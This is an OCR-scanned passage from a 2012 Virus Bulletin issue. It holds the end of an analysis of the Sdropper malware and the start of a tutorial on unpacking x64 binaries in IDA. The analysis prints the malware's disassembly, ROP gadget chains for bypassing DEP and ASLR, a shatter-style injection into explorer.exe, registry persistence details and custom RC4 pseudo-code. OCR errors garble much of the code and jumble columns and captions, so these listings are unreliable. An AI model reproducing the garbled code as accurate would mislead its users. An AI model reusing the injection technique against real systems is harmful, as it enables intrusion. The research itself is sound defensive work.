; CODE XREFi _GetMemoryMappedAddress0nTargetedProc+13Tj 
ICh ; duLength 

eax, [ebp+MemBasicInFo] 
eax ; lpBuFFer 

esi ; IpAddress 

[ebp+hProcess] ; hProcess 

edi ; UirtualQueryEx 
eax, eax 

short loc_402866 


pop 

pop 

moo 

pop 

leave 

retn 


edi 

esi 

eax, 

ebx 


; CODE XREFi _GetMemoryMappedAddressOnTargetedProc+30Tj 


GetMemoryMappedflddressOnTarqetedProc endp 


Figure 8: The same loader code can be found in explorer.exe shared memory and in the malware's mapped view. 


v. Gadget 5 

• mov ecx, 94h; 

• rep movs [edi], [esi]; 

• pop edi; 

• xor eax, eax; 

• pop esi; 

• pop ebp; 

• retn 8; 

The malware author has also considered the limitations 
imposed by Address Space Layout Randomization 
(ASLR) on a potentially infected machine. When ASLR is 
enabled, a module will have a dynamic image base address 
when loaded by the operating system. This is a security 
mechanism designed to make exploit code development 
more challenging. In order to mitigate ASLR protection, 
Sdropper uses the following algorithm to look for the ROP 
gadgets among the common dynamic link libraries (DLL) 
loaded into explorer.exe: 

i. Uses EnumProcessModules to get a list of module 
handles loaded in explorer.exe. 

ii. Reads 1,024 bytes from the starting address of 


the module that usually contains the PE structure 
information. 

iii. Makes sure the module is a valid executable by 
checking the MZ header and PE signature from the 
structure. 

iv. Goes through the section table from the structure 
and looks for the ‘.text’ section, which normally 
stores the executable code. 

v. As checking the ‘.text’ string name alone is not 
enough, it also ensures that the section has the 
IMAGE_SCN_MEM_EXECUTE attribute, which 
indicates that the section can be executed as code. 

vi. If all the conditions match, it searches for the ROP 
gadget from the code section and retrieves its virtual 
address location. 

vii. The ROP gadget virtual address is then saved to the 
loader code. 

Figure 9 shows the layout of the incomplete loader code 
with partial ROP gadgets set up. In the final stage, Sdropper 
will look for ROP gadget 4 and also hijack a function that 
will be used to store the shellcode contents. It chooses 
Ntdlllatan, probably because the function is unlikely to be 
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Figure 9: Memory view of incomplete loader code with ROP 
gadgets. 


.teXt:U040bU20— 

- [IUST1 - 

ottset aHtan i —;—Tran- 

.text:0O405C25 

push 

offset aNtdll_dll_10 ; "ntdll.dll" 

.text:0O405C2A 

nou 

[esi+78h], eax 

.text:0O405C2D 

call 

edi ; GetModuleHandleA 

.text:0O405C2F 

push 

eax 

.text:O0405C3G 

call 

MyGetProcAddress 

.text:0O405C35 

nou 

[esi+18h], eax 

.text:0O405C38 

lea 

eax, [ebx+ODOh] 

.text:00405C3E 

nou 

[esi+ICh], eax 

.text:0O405C41 

nou 

eax, [ebp+ActualShellcodeSize] 

.text:0O405C44 

push 

0 

.text:00405C46 

nou 

[esi+20h], eax 

.text:00405C49 

push 

offset aMriteprocessne ; "WriteProcessMenory" 

.text:00405C4E 

lea 

eax, [ebx+30h] 

.text:00405C51 

push 

offset aKernel32_dll_2 ; "kernel32.dll" 

.text:O0405C56 

nou 

[esi+24h], eax 

.text:00405C59 

call 

edi ; GetModuleHandleA 

.text:004O5C5B 

push 

eax 

.text:00405C5C 

call 

MyGetProcAddress 

.text:0O405C61 

nou 

[esi+7Ch], eax 

.text:Q04O5C64 

nou 

eax, [esi+18h] 

.text:004O5C67 

nou 

[esi+28h], eax 

.text:0O405C6A 

nou 

eax, [esi+70h] 

.text:00405C6D 

nou 

[esi+10h], eax 

.text:0O405C7 0 

push 

2 ; GadgetsLength 

.text:00405C72 

lea 

eax, [ebp+R0PGadget4] 

.text:O04O5C75 

push 

eax ; ROPGadgets 

.text:0O405C76 

push 

[ebp+hProcess] ; hProcess 

.text:004O5C79 

add 

ebx, OfiOh 

.text:O04O5C7F 

nou 

[esi+38h], ebx 

.text:00405C82 

call 

_x86findR0PGadgets 

0000S03S |0040SC35: 

CustomizeShellcode+102 



Figure 10: Get Ntdlllatan (as a placeholder that will be 
overwritten with shellcode contents) and get ROP gadget 4. 



Figure 11: Memory view of loader code with complete ROP 
gadgets. 


memory. Since the ROP gadget is a chain of instructions, 
WriteProcessMemory will be executed in the chain at some 
point, and will eventually write the shellcode contents to the 
targeted function address, followed by a return instruction 
that will transfer execution to the shellcode. We will discuss 
how the shellcode is executed in the next section. 

LOADER CODE WRAP UP 

After the ROP gadgets set-up is completed, Sdropper tries 
to locate the main payload address, that is, the typical 
malware routines such as dropping and creating files, 
adding and modifying registry keys, and downloading 
and executing additional malware components. This main 
payload can be found in InjectNormalRoutine, and similarly 
to InjectedShellcodeStart, it can be retrieved from one of the 
exported functions stored in the binary. 

Sdropper creates an exclusive file mapping object (to store 
the contents of the original executable) using the object 
name obtained from the registry key HKEY_LOCAL_ 
MACHINE\SOFTWARE\Microsoft\Cryptography and the 
first 10 characters from the data stored in MachineGuid. 
Keep in mind that the malware will open and retrieve the 
same exclusive file mapping object in order to get the 
address of InjectNormalRoutine. This will be covered in the 
last section of this article. 

The malware also gets and stores the original handle 
value of a specified Windows class object and the return 
value of DWL_MSGRESULT by calling the FindWindow 
and GetLongWindow APIs, respectively. The similar 
Windows GUI API functions, SetWindowLong and 
SendNotifyMessage, will be used in order to start the loader. 

This technique is very similar to the known Windows shatter 
attack, which replaces the look-up table with a custom 
look-up table containing shellcode, as we mentioned at 
the beginning of this article. The malware also does a 
similar thing by replacing the look-up table returned by 
GetLong Window with its own table containing a pointer to 
the loader code generated earlier. 

This vulnerability is believed to be a design flaw in 
Windows messaging; however, a detailed description of the 
flaw is outside the scope of this article. Nevertheless, this 
is an interesting approach compared with the conventional 
code injection method. In the next section, we will cover 
how Sdropper manages to execute the shellcode located in 
the shared memory. 


used by explorer.exe as it will crash the Windows desktop, 
which may in turn alert the user to the malware’s existence. 

Besides the ROP gadgets, Sdropper also saves the necessary 
parameters for WriteProcessMemory into the shared 


SHELLCODE EXECUTION ROADMAP 

The final loader is ready to be executed via 
S etWindo wLong. 
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text:00405F29 

mou 

eax, [ebp+customshellcodeaddrontargetedProc] 

text:00405F2C 

sub 

eax, -128 


text:00485F2F 

push 

eax ; 

dwNewLong 

text:00405F3O 

push 

ebx ; 

nIndex=DWL MSGRESULT 

text:00405F31 

push 

edi ; 

hWnd 

text:00405F32 

call 

ds :SetWindouLongA 

; Replaced the pointer to the lookup table with the address of the arbitrary lookup table address 

text:00405F38 

push 

ebx ; 

IParam 

text:00405F39 

push 

ebx ; 

wParam 

text:00405F3A 

push 

WM_PAINT ; 

Msg 

text:00405F3C 

push 

edi ; 

hWnd 

text:00405F3D 

call 

ds :SendNotifyMessageA 

text:00405F43 

push 

600O0 ; 

dwMilliseconds 

text:00405F48 

push 

esi ; 

hHandle 

text:00405F49 

call 

ds :WaitForSingleObject 

text:0O405F4F 

test 

eax, eax 


text:0O405F51 

jnz 

short loc 405F57 


text:00405F53 

mou 

[ebp+blnjecctionSuccess] , 1 


Figure 12: Routine that triggers the loader code using a similar approach to the Windows shatter attack. 
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Figure 13: Memory view of complete loader code. 


When the Windows messaging API has successfully been 
exploited, explorer.exe will first execute the following ROP 
gadget instructions from the loader in sequence: 

Gadget 1 

ntdll!RtlQueryAtomlnAtomTable+OxllO: 

7c92cl04 fd std 

7c92cl05 c3 ret 


The first gadget will set the Direction Flag (DF) of the flags 
register so that the data will be copied into the stack in a 
backwards direction. After the copy operation is completed, 
it will reset the DF flag. This activity can be illustrated with 
the following diagram: 



Figure 14: Overwrite the stack with ROP gadgets. 


Gadget 5 

SHELL32!CFileSysBindData::GetFindData+OxlO: 
7c9ee84e b994000000 mov ecx,94h 


Now the stack contains the return-oriented payload. The 
next thing it needs to do is to perform a stack pivot through 
a sequence of ‘xchg eax, esp; retn;’ instructions. The stack 


7c9ee853 

f 3a5 

rep 

movs dword ptr 

pivot can be found in the Ntdll! 

_chkstk: 


es:[edi],dword 

ptr [esi] 






7c9ee855 

5f 

pop 

edi 

ntdll! chkstk: 




7c9ee856 

33c0 

xor 

eax,eax 

001b:7c901a09 

3d00100000 

cmp 

eax,lOOOh 

7c9ee858 

5e 

pop 

esi 

001b:7c901a0e 

73 Oe 

j ae 

ntdll!_ali 

7c9ee859 

5d 

pop 

ebp 

probe+0x!5 (7c901ale) 



7c9ee85a 

C20800 

ret 

8 

001b:7c901al0 

f 7d8 

neg 

eax 





001b:7c901al2 

03c4 

add 

eax,esp 

Gadget 2 




001b:7c901al4 

83c004 

add 

eax, 4 

Explorer, 

iCTray: 

: MigrateOldBrowserSettings+0xd5: 

001b:7c901al7 

8500 

test 

dword ptr 

0101c2b0 

f c 

old 


[eax],eax 




0101c2bl 

c3 

ret 


001b:7c901al9 

94 

xchg 

eax,esp 



OCTOBER 2012 


31 



























































VIRUS BULLETIN www.virusbtn.com 



Figure 15: Shellcode execution roadmap. 


.text: 00405080 

public 

InjectedShellCodeStart 

.text:00405080 
.text:004O5A8fl 

InjectedShellCodeStart proc near ; D0T0 XREF: .rdata:off_409538jo 

.text:00405080 
.text:00405080 

arg_0PIFunctions= duord ptr 8 

.text:00405080 

mou 

ebp, esp 

.text:O04O5A8C 

mou 

esi, [ebp+arg_0PIFunctions] ; Pointer to the address oF UM APIs stored in the first stage (OxO0870f6f) 

.text:0040508F 

xor 

ebx, ebx 

.text:00405091 

cmp 

[esi+2Ch], bl 

.text:00405894 

jnz 

short QQNo FileMappingObjectNameFound 

,text:00405096 

lea 

eax, [esi+l4h] ; File mapping object name 

.text:00405099 

push 

eax 

,text:00405090 

push 

ebx 

.text:0040509B 

push 

26h 

.text:004O589D 

nov 

byte ptr [esi+2Ch], 1 

,text:00405001 

call 

duord ptr [esi] ; kernel32?0penFileMapping 

.text:00405003 

mou 

edi, eax 

,text:00405005 

cmp 

edi, ebx 

,text:0O405007 

u 

short QQNoFileNappingObjectNameFound 

.text:00405009 

push 

ebx 

,text:0O405000 

push 

ebx 

.text:0040500B 

push 

ebx 

.text:0040500C 

push 

26h 

.text:0040500E 

push 

edi 

.text:0O4O500F 

call 

duord ptr [esi+4] ; kernel32!MapUieu0fFile 

.text:0O4O50B2 

cmp 

eax, ebx ; eax = address of mapped uieu that uill store the sdropper32 

.text:004050B4 

jz 

short loc_4050C4 

.text:0O4050B6 

mou 

ecx, [esi+28h] ; esi = RU0 of InjectNormalRoutine 

.text:O04050B9 

push 

ebx 

.text:004050B0 

push 

ebx 

.text:004050BB 

push 

eax 

.text:0O4050BC 

add 

ecx, eax 

.text:004050BE 

push 

ecx ; ThreadRoutine = U0 of InjectNormalRoutine of mapped uieu 

.text:O04050BF 

push 

ebx 

.text:0O4050C0 

push 

ebx 

,text:O04050C1 
.text:OO4050C4 

call 

duord ptr [esi+OCh] ; kernel32fCreateThread 

.text:004050C4 

loc_4050C4: 

; CODE XREF: InjectedShellCodeStart+20tj 

.text:0O4O50C4 

push 

edi 

.text:004050C5 
.text:OO4050C8 

call 

duord ptr [esi+8] ; kernel32fCloseHandle 

.text:O04050C8 
.text:OO4O50C8 

GG?No_FileMappingObjectNameFound: ; CODE XREF: InjectedShellCodeStart+0tj 

; InjectedShellCodeStart+IDtj 

.text:004050C8 

push 

duord ptr [esi+20h] 

.text:004050CB 

push 

ebx 

.text:0O4O58CC 

push 

duord ptr [esi+24h] 

.text:0O4050CF 

call 

duord ptr [esi+10h] ; User32fSetUindouLong (set back the original ualue of ShellTrayWnd message result) 

.text:004050D2 

xor 

eax, eax 

,text:0O4050D4 

add 

esp, 54h 

.text:O04050D7 

pop 

ebp 

.text:0O4050D8 
.text:0O4O50D8 
.text:004050D8 

retn 

10h 

.text:004050DB 

; Exported entry 7. 

InjectedShellCodeEnd 


Figure 16: The shellcode will execute the malware’s main payload. 


001b:7c901ala 
[eax] 

8b00 

mov 

eax,dword ptr 

001b:7c901alc 

50 

push 

eax 

001b:7c901ald 

c3 

ret 



This routine will adjust the stack pointer to point to 
the stack frame that consists of arguments required 


by WriteProcessMemory. This function will be 
executed immediately upon returning from Ntdll!_ 
chkstk. As described earlier, the main goal for the 
WriteProcessMemory API call is to hijack the content in 
Ntdlllatan with Sdropper’s shellcode. The malware has 
successfully bypassed DEP when the shellcode is injected 
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into Ntdlllatan. It will then execute the last couple of 
gadgets in order to pass control to the hijacked function: 

Gadget 3 

Explorer!SpecialFolderList::ReadIconSize+0x2: 

01013874 58 pop eax 

01013875 c3 ret 

Gadget 4 

Explorer!DefSubclassProc+0x27: 

01002240 ffeO jmp eax {ntdlllatan 

(7c901d75)} 

The diagram in Figure 15 clarifies the whole roadmap of 
shellcode execution. 

THE FINAL DESTINATION 

Finally, we reach the shellcode. Although it does not do 
anything fancy like the return-oriented payload, it is an 
important entry point for Sdropper to achieve its goal. It 
first tries to open the existing malware-specific file mapping 
object, which as mentioned earlier, is needed to obtain the 
malware’s main payload. After the main payload routine has 
been determined, the malware passes it as a thread routine 
to the CreateThread API, so that the main payload is run in 
the process context of explorer.exe. 

There are a couple of tasks that Sdropper performs once 
the main payload is executed in the process context of 
explorer.exe: 

1. It creates a mutex name, unique to every machine, 
based on the registry key HKEY_LOCAL_ 

M ACHINE\S OFT WAREVMicro soft\Cryptography\ 
MachineGuid. The MachineGuid data is used to form 
the malware’s infection marker: 

Infection_Marker: {MachineGuid}gfdgfdgdfg 

If no MachineGuid is found on the infected machine, 
it will form the following infection marker instead: 

Infection_Marker: {MachineGuid}fgfdggfd 

The mutex name is then combined with the infection 
marker, as well as the hexadecimal value of the 
process ID of explorer.exe: 

Mutex name: Global\{Infection_Marker}{HexVal_ 
Explorer_Pid} 

Example: 

Global\ebb80e80-143c-4014-8ca5- 
6b5a7894ec2agfdgfdgdfg708 

2. The malware will also store the infection marker to 
the registry key, and will use the infection marker 
generated above to form a global infection marker: 


Global_Infection_Marker: {AlphaCharacterOnlyFrom 
MachineGuid}gfdgfdgdfg 

Example: 

ebbeccabaecagfdgfdgdfg 

After the global infection marker has been 
determined, it will save it to the following registry 
key: 

Key: HKEY_CURRENT_USER\Sof tware\ 

{GlobalInfectionMarker} 

Value: CurrentPath 

Data: Data: %COMMONAPPDATA%\ 

{GloballnfectcionMarker}.exe 

3. It creates and drops a copy of itself to 

%COMMONAPPDATA%, using the global infection 
marker as the filename. 

%COMMONAPPDATA%\{GloballnfectionMarker}.exe 
Example: 

C:\Documents and Settings\All Users\Application 
Data\ebbeccabaecagfdgfdgdfg.exe 

It then creates a start-up registry key pointing 
to the file %COMMONAPPDATA%\ 
{GlobalInfectionMarkerj.exe to ensure that Sdropper 
will survive after the system restarts: 

Key: HKEY_CURRENT_USER\Software\Microsoft\ 
Windows\CurrentVersion\Run 

Value: {GloballnfectionMarker} 

Data: Data: %COMMONAPPDATA%\ 

{GloballnfectcionMarker}.exe 



Figure 17: C&C server configuration information. 
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4. 


// ASCII table initialization 
// 

counter =0; 

while (counter < 256) 

{ 

AsciiTable[counter] = (char) counter ; 
counter++ ; 

} 

// 

// ASCII table permutation 
// 

counter = 0 ; 

indexl = 0; 

while (counter < 256) 

{ 

tempAscii = AsciiTable[counter] ; 

indexl = (char) (AsciiTable[counter] + key[counter%keylength] + indexl) & OxFF; 
// Byte switching 

AsciiTable[counter] = AsciiTable[indexl] ; 

AsciiTable[indexl] = tempAscii; 
counter++; 

) 

// 

// Data XOR encoding/decoding 
// 

indexl =0; 
index2 =0; 
counter =0; 
while (datalength) 

{ 

// Second ASCII table permutation 

indexl = (counter + 1)&0 xFF; 
tempi = AsciiTable[indexl] ; 
index2 = (tempi + index2) 60xFF; 
temp2 = AsciiTable[index2] ; 

// Second byte switching 

AsciiTable[indexl] = temp2 ; 

AsciiTable[index2] = tempi; 

// XOR encode/decode the input data 

tempAscii = Data[counter] A AsciiTable [( (templ+temp2) %256)&0xFF] ; 

*Output++ = tempAscii; 
counter = indexl; 
datalength —; 

> _ 


It also determines whether it is running in the 
context of explorer.exe. If it is, it attempts to create 
two persistent threads running in explorer.exe. One 
of the threads is a simple protection mechanism, 
responsible for monitoring and protecting the 
dropped executable in %COMMONAPPDATA%\ 
{GlobalInfectionMarkerj.exe and its start-up registry 
key from being removed from the infected machine. 

The other thread is responsible for establishing 
a connection between the malware and the C&C 
server. Sdropper (at this point, the client backdoor 
program) starts sending requests to the C&C server 
in order to retrieve additional commands from the 
attacker for execution. The botnet client will send a 
request to the C&C server at 10-minute intervals. 

The C&C configuration information can be found in 
the \cfg’ section of the malware binary’s sections: 

The first DWORD value from this section represents 
the offset value to the embedded MZ, while the next 
DWORD value represents the size of the embedded 
binary file. This malware supports x64 architecture, 
and this embedded binary is compiled specifically for 
machines running on the x64 platform. 

The configuration file will be saved as 
%COMMONAPPDATA%\{ GloballnfectionMarker}. 
cfg. It is locked for exclusive access by the malware, 
via the Windows LockFileEx API function. 

The malware uses the same custom RC4 algorithm 
encryption scheme for the configuration file on 
disk and the data sent to the C&C server. The RC4 
encryption/decryption key can be either: 

a. The hostname of the C&C server, if the data is 
going to be sent to the remote server. 

b. The infection marker, if the data is going to be 
stored on the disk. 

The diagram in Figure 18 shows a few lines of code 
to clarify the custom RC4 algorithm (reversed from 
the binary): 

It also performs an inline hook to the function 
NtResumeThread/ZwResumeThread found in 
explorer.exe. This results in code injection into a 
newly created process; however, it only targets the 
following processes: 

• explorer.exe 

• iexplorer.exe 

• firefox.exe 

• mozilla.exe 

Inside the hook function, it will determine 


Figure 18: A few lines of code to clarify the custom RC4 
algorithm. 

whether there is an associated thread handle 
from the newly created process. If there isn’t, it 
will call either the CreateRemoteThread (x86) 

API or RtlCreateuserThread (x64) API, with 
the handle of the process to execute the thread 
routine InjectNormalRoutine (i.e. the malware’s 
main payload). Otherwise, it will call the 
NtQueueApcThread (both x86/x64) API with the 
handle of the thread to start another thread routine, 
InjectApcRoutine. Both these routines perform a 
similar operation. 


This is probably the first malware that takes advantage of 
the Windows messages flaw to perform code injection. By 
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Figure 19: InjectNormalRoutine vs. InjectApcRoutine. 


injecting code using this vulnerability, the malware is able 
to evade HIPS-based detection. This is why the author 
has designed the malware to execute its typical malware 
routines only after the flaw has successfully been exploited. 
However, Sdropper does unintentionally leave traces during 
the initial execution that can easily be used to detect the 
malware’s presence before it causes further havoc on the 
machine. Regardless of whether or not the vulnerability 
exploitation fails (or if the vulnerability has been patched 
on the machine), the malware also has an alternative 
approach to perform code injection by using a traditional 
code injection method; fortunately, this approach is not 
complicated and will cause an anti-virus product to issue an 
alert, leaving the malware nowhere to hide. 
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TUTORIAL 

UNPACKING X64 PE+ BINARIES 
PART 3: IDA, GRAPHS AND 
BINARY INSTRUMENTATION 

Aleksander P. Czarnowski 
AVET, Poland 


In previous parts of this tutorial series [1,2] I’ve given the 
same basic background on the difference between Windows 
on 32- and 64-bit platforms and demonstrated some useful 
tricks that are helpful in unpacking x64 binaries. However, 
each of the methods discussed so far has had one drawback: 
since they are manual they do not scale well. In the real 
world, binary instrumentation and automation of the 
unpacking process is a must. 

In this article I’ll describe one more manual unpacking 
approach which is quite different from the methods 
already discussed, and then I’ll move on to some scripting 
examples. Each solution presented in this article requires 
only one tool: IDA. 

GRAPH-BASED APPROACH 

IDA has a couple of extremely useful graph features. Graph 
data can be extracted for additional analysis or manipulation 
through SDK or IDAPython interfaces, for example. We can 
use graph properties as an aid in the process of searching 
for the Original Entry Point (OEP). Even without reverting 
to the material presented in [1] and [2], we can imagine 
that somewhere within the decompression/IAT rebuild/ 
obfuscation code must probably exist a single exit point 
which transfers execution flow to the original entry point. 
Now imagine such a flowchart graph - it should be similar 
to the one presented in Figure 1. This clearly shows that one 
of the bottom graph nodes should be transferring execution 
to the original entry point. Since this is an interesting 
theory, let’s check it in practice using our test file from [1]: 

1. Load the test file into 64-bit IDA. 

2. Accept all warnings regarding I AT table corruption 
and allow IDA to load the file and create the assumed 
IAT automatically. 

3. Select the ‘Local Bochs Debugger’ option from the 
‘Choose debugger’ menu (don’t forget to configure 
the Bochs plug-in to handle 64-bit PE files). 

4. Select the ‘Stop on entry point’ option in the 
‘Debugger option’ menu. 

5. Run the target process (F9 - start process). 

IDA debugger should stop at the address .MPRESS2:0 
0000000004040C2 (in short form 0x04040C2) where 
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Figure 2: Flowchart graph of entry point. 
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Figure 1: Imaginary flowchart graph of decompression 
loop. 

the PUSH RDI instruction is located. Now, from the 
‘Views’->‘Graphs’ menu, select the ‘Flowchart’ option 
(FI2). A picture similar to Figure 2 should be displayed. 
Now zoom in (Figure 3) to reveal the bottom nodes and 
sub_40441A. Jump to this subroutine (press ‘g’ and 
enter ‘sub_40441A’ as the address - IDA will resolve it 
correctly) and place a breakpoint on it. Figure 4 shows the 
disassembly of this procedure. Note that this procedure 
is just a single JMP instruction and higher addresses (the 
lower part of the disassembly listing) are occupied by 
garbage bytes. Those bytes could be the compressed image 
or some other data (including real garbage) but they are 
definitely not a valid code area. Further analysis reveals that 
this is not the original entry point. So far it seems our theory 
isn’t valid. But before we come to any conclusion let’s get 
back to our imaginary flowchart in Figure 1. The bottom 



Figure 3: Zoom of bottom nodes of entry point flowchart 
graph. 
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. MPRESS2:000000000040441A 

.MPRESS2:0000000000404410 Attributes: thunk 

.MPRESS2:0000000000404410 

.MPRESS210000000000404410 sub 40441A proc near ; CODE XREF: starttj 

.MPRESS210000000000404410 ; start+102tj 




I.MPRESS2:0000000000404410 jmp sub 40106F 


.MPRESS2:0000000000404410 sub 404410 endp 
.MPRESS2:0000000000404410 

- nnnnnnnnnnii nJiJi-lfl 

.rirntiiZ - HHUUIIUUIIIIII4II44 1 H 

.MPRESS2:000000000040441F byte 4Q441F db QEIh ; D0T0 XREF: start+7to 

.MPRESS2:000000000040441F ; start+ADto ... 

|.|p nrern - nnnnnnnnnnii OJiJiOO 

.rirntiiZ - IIIIIIIIIIU UIIII114II44ZII 

.MPRESS2:0000000000404420 retF 

HPdecco - nnnnnnnnnnii 01.1.0 n 

. llrKtioi - IIIIIIIIIIIIIIIIII114U44Z 11 

.MPRESS2:00000000O0404421 db OFFh , OFFh , OFFh , OFFh , OFFh , OFFh , 0 

.MPRESS2:0000000000404428 dq 734D000000h, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 
.MPRESS2:0000000000404428 dq 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
.MPRESS2:0000000000404428 dq 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 


Figure 4: Disassembly of sub_40441A. 



Figure 5: Graph of second function: sub_40106F. 



Figure 6: Zoom of bottom nodes from sub_40106F function. 


(exit) nodes from the entry point may lead to further parts 
of decompression routines. Therefore our theory could still 
be valid, and to prove it we need to inspect further functions 
which are bottom nodes on our graph. 


a strange near call and some garbage code after the call 
instruction. If you fix the call address, changing it from 
loc_401AC+l to loc_401AD, the proper disassembly of the 
called function will look like this: 


Now let’s follow the jump using the ‘Step into’ option (F7). 
We land at the .MPRESS 1:000000000040106F function 
(sub_40106F) and IDA stack analysis fails here. Once again, 
use the ‘Flowchart’ option (FI2) - the result is shown in 
Figure 5. Scroll the graph to the bottom and zoom into the 
two red nodes (Figure 6). Inspection of loc_40108C reveals 


.MPRESSl:00000000004010AD loc_4010AD: 

; CODE XREF: .MPRESSl:000000000040109Fp 

.MPRESSl:00000000004010AD pop rex 

.MPRESSl:00000000004010AE call GetModuleHandleA 

.MPRESSl:00000000004010B3 or rax, rax 

.MPRESSl:00000000004010B6 jz short loc_401103 
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.MPRESSl:00000000004010B8 
4010C9+3 

.MPRESSl:0000000000401OBD 

.MPRESSl:00000000004010BE 
506C6175h 

.MPRESSl:00000000004010C5 
loc_401135+l 

.MPRESSl:00000000004010C7 
loc_40112D+l 

.MPRESSl:00000000004010C9 

.MPRESSl:00000000004010C9 
; CODE XREF: 

.MPRESSl:00000000004010C9 
[rax+rax+5Ah] 

.MPRESSl:00000000004010CD 
.MPRESSl:00000000004010CE 
.MPRESSl:00000000004010CF 


call 

near ptr loc__ 

push 

rsi 

imul 

esi, [rdx+74h], 

jb 

short near ptr 

jz 

short near ptr 

loc_4010C9: 

.MPRESSl:00000000004010B8p 

movzx 

rsi, dword ptr 

push 

rax 

pop 

rex 


call GetProcAddress 


The calls to GetModuleHandleA and GetProcAddress make 
this function’s purpose quite obvious - although note that 
this is not the IAT rebuilding loop yet. Again, this is not our 
exit to the original entry point. 

Let us examine the second red node - if you trace its caller 
(Figure 7) you will find that it is the short procedure which 
restores general registers from the stack and that it ends 
with a strange jump. Put a breakpoint at the jump and 
execute the process again (F9). Further analysis will reveal 
that this is in fact a jump to the original entry point. This 
proves that our theory was correct. What is more important 
is that the demonstrated method is generic and can be 
applied not only to different decompression/obfuscation 



schemes but to other executable file formats, processors and 
system platforms as well. 

Please note that the assumptions made here are not entirely 
valid in the case of ‘virtualizing’ original code before 
compression/further obfuscation. In such cases the original 
entry point does not give us much information since the 
original native code is in the form of bytecode for the 
virtual (imaginary) processor. Decompilation in order to 
return to native code is beyond the scope of this tutorial. 


THE TRACE REPLAYER 

A new feature called ‘trace replayer’ was introduced in 
IDA 6.3. This is a form of specialized debugger that allows 
the execution flow to be recorded. This feature can be 
used for unpacking as well. Again, we need to make some 
assumptions to start. Our first assumption will be that every 
user-land PE process ends with the ExitProcess() function. 

If the decompression/deobfuscation process works correctly, 
when reaching the original entry point the process should 
not crash or call ExitProcess. The ExitProcess call should 
be made from the original code when the main function 
exits. Note that when we refer to the main function we do 
not consider the C/C++ main() function. 

To demonstrate the use of trace replayer let’s load our 
sample file into IDA again (remember this will not work 
in versions older than 6.3) and again select ‘Local Bochs 
debugger’, enabling a break at the entry point option. When 
the breakpoint is hit, enter a breakpoint at the 
kemel32_ExitProcess function and select from the 
‘Debugger’ menu the ‘Tracing’->‘Instruction tracing’ 
option. Now run the process again (F9) and wait... it 
might take a longer time since neither instruction tracing 
(which, internally, is automatic single stepping) nor Bochs 
emulation are speedy daemons. When the ExitProcess 
breakpoint is finally hit, select the ‘Trace window’ option 
from the ‘Debugger’->‘Tracing’ menu. Jump to the end of 
the trace listing and move upwards. Finally you will find 
JMP NEAR PTR QWORD_401200+0E00h - this is the 


Please confirm 




IDA has detected that RIP points to 
an address which is not defined as code. 

Would you like to directly create an instruction at RIP ? 


Yes I No 

□ Don't display this message again 


Figure 7: Jump to original entry point procedure found with 
graph analysis. 


Figure 8: IDA asks if the current RIP location from the 
trace window should be converted to code. 
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jump to the original entry point. If you click on the next 
address (.MPRESSl:qword_401200+E00) at the trace 
window, IDA will ask you if this RIP location should be 
defined as code (see Figure 8): agree. Our trace should look 
like that shown in Figure 9. If you click on the next location 
after JMP you will see our main code disassembly starting 
from the original entry point: 


where IDA IDC and IDAPython functionality comes to the 
rescue. Since IDA also supports plug-in architecture you 
might consider this option including developing plug-ins 
using C/C++. On the other hand, IDC and IDAPython allow 
more rapid development and are available in a more dynamic 
way. Additionally, IDA already allows IDAPython and IDC 
scripts to be loader and processor modules. 


1:0000000000401200 align lOOOh 
.MPRESS1:0000000000402000 sub 
.MPRESS1:0000000000402004 mov 
.MPRESS1:000000000040200A mov 
.MPRESS1:0000000000402011 mov 
.MPRESS1:0000000000402018 xor 
.MPRESS1:000000000040201B call 
.MPRESS1:0000000000402021 mov 
.MPRESS1:0000000000402023 call 


rsp, 2 8h 

r9d, 0 

r8, 401000h 

rdx, 40100Eh 

rex, rex 

cs:off_40304C 

ecx, eax 

cs:off 40303C 


Just like the previous method, the trace replayer can be 
used in the unpacking of files other than x64 PE files. It 
also works with other debuggers so it is possible to use it 
in conjunction with a remote debugger, for example. Single 
stepping is already time consuming, and Bochs adds an 
additional delay since it is an emulator. In the case of files 
that are larger than our example, tracing can take more time 
than is acceptable. In such cases switching from Bochs to a 
real operating system can help. 

There are more features to the trace replayer than those 
shown here, including the colouring of executed areas of 
code etc. 


il 


O C 


□ m 


Thread 

Address 

Instruction 

Jl 00000CFC 

. M P RESS1 : su b_40106F: 1 o c_401132 

lodsb 


ji 00000CFC 

.MPRESSl:sub_40106F:loc_401132+l 

lodsb 


ji 00000CFC 

.MPRESSl:sub_40106F+C6 

lodsb 


ji 00000CFC 

.MPRESSl:sub_40106F+A4 

lodsq 


ji 00000CFC 

.MPRESSl:sub_40106F+A6 

emp 

eax, OFFFFFFFFh 

ji 00000CFC 

.MPRESSl:sub_40106F+A9 

jz short loc_401165 

ji 00000CFC 

.MPRESSl:sub_40106F:loc_401165 

lea i 

rdi, sub_40106F 

ji 00000CFC 

.MPRESSl:sub_40106F+FD 

mov 

al, 0E9h 

ji 00000CFC 

.MPRESSl:sub_40106F+FF 

stosb 


ji 00000CFC 

.MPRESSl:sub_40106F+100 

mov 

eax, 10 Ch 

ji OOOOOCFC 

.MPRESSl:sub_40106F+105 

stosd 


ji OOOOOCFC 

.MPRESSl:sub_40106F+106 

add 

rsp, 28 h 

ji OOOOOCFC 

.MPRESSl:sub_40106F+10A 

pop 

r8 

ji OOOOOCFC 

.MPRESSl:sub_40106F+10C 

pop 

rdx 

ji OOOOOCFC 

.MPRESSl:sub_40106F+10D 

pop 

rex 

ji OOOOOCFC 

.MPRESSl:sub_40106F+10E 

pop 

rbx 

ji OOOOOCFC 

.MPRESSl:sub_40106F+10F 

pop 

rsi 

ji OOOOOCFC 

.MPRESSl:sub_40106F+110 

pop 

rdi 

ji OOOOOCFC 

.MPRESSl:sub_40106F+lll 

jmp 

near ptr qword_401200+0E00h 


Figure 9: Trace replayer window. 


As with previous examples, we need to start with some 
assumptions regarding the original entry point. One 
assumption that we can make is that since decompression/ 
deobfuscation code is being added to the already linked PE 
file, it can attach itself as a last section. This should lead to 
a situation where the instruction that jumps to the original 
entry point has a higher address than its target. Since there are 
many different ways to transfer control for generic solutions 
we can’t rely on JMP instruction opcodes for detecting the 
jump to the original entry point. However, we can try to 
assume that if the RIP register points below our executable 
module entry point, we might have found the original entry 
point address. Now let’s implement this idea in IDAPython: 


start_addr = BeginEAO 

RunTo(start_addr) 

